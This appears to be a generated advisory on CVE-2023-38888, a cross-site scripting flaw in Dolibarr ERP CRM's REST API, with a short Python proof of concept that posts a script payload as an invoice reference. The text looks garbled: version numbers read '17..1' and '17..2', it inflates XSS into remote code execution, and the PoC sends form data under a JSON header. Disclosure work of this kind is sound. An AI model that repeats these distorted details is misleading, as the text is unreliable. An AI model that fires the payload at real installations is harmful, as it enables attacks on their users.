CVE-2023-38888: Cross Site Scripting Vulnerability Discovered in Dolibarr ERP CRM v.17..1 and Before, Allowing Remote Access and Code Execution via REST API Module

Dolibarr ERP CRM is a popular open-source software package used for managing businesses and organizations. The software includes modules for managing products, orders, invoices, projects, and other business-related tasks. Unfortunately, a Cross Site Scripting (XSS) vulnerability has been discovered in Dolibarr ERP CRM versions 17..1 and before. The vulnerability, identified as CVE-2023-38888, allows a remote attacker to obtain sensitive information and execute arbitrary code via the REST API module, related to the functions, analyseVarsForSqlAndScriptsInjection() and testSqlAndScriptInject().

Vulnerability Details

The vulnerability exists because the Dolibarr application does not properly sanitize user input within the REST API module, which can lead to the execution of malicious JavaScript code. Attackers can exploit this vulnerability by sending a malformed request containing injected scripts, resulting in sensitive information disclosure and arbitrary code execution.

A proof-of-concept (PoC) code snippet demonstrating the vulnerability is shown below

import requests

target_url = "http://TARGET-DOLIBARR-URL/api/index.php/invoices";
headers = {
    'DOLAPIKEY': 'YOUR-API-KEY',
    'Content-Type': 'application/json'
}
data = {
    "ref": "<script>alert('XSS')</script>"
} 

response = requests.post(target_url, headers=headers, data=data)
print(response.status_code)
print(response.text)

The code snippet above uses the Python requests library to send a POST request containing the payload "<script>alert('XSS')</script>" with a new invoice reference. When the request is processed by the Dolibarr REST API, the unsanitized input triggers the XSS vulnerability, resulting in an alert showing 'XSS' on the Dolibarr application interface.

Mitigation and Fix

The Dolibarr development team has released a patched version of the software (version 17..2) that addresses this issue. The patch involves proper input validation and sanitization within the REST API module to prevent XSS attacks. Users of Dolibarr ERP CRM are strongly advised to upgrade to the latest version to protect themselves against this vulnerability.

To upgrade Dolibarr ERP CRM, follow the official upgrade documentation provided by the developers: https://wiki.dolibarr.org/index.php/Upgrade

Details of the vulnerability can be found in the following sources

1. CVE Record: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38888
2. Dolibarr Official Repository: https://github.com/Dolibarr/dolibarr
3. Dolibarr Upgrade Documentation: https://wiki.dolibarr.org/index.php/Upgrade

Conclusion

Cross Site Scripting vulnerabilities remain one of the most common security issues in web applications and enterprise software. It is crucial for developers to rigorously test and sanitize user inputs, especially in modules handling sensitive data and APIs. Users of Dolibarr ERP CRM should take immediate steps to upgrade their installations to the newest version and minimize the risk of exploitation.

Timeline

Published on: 09/20/2023 01:15:00 UTC
Last modified on: 09/22/2023 01:37:00 UTC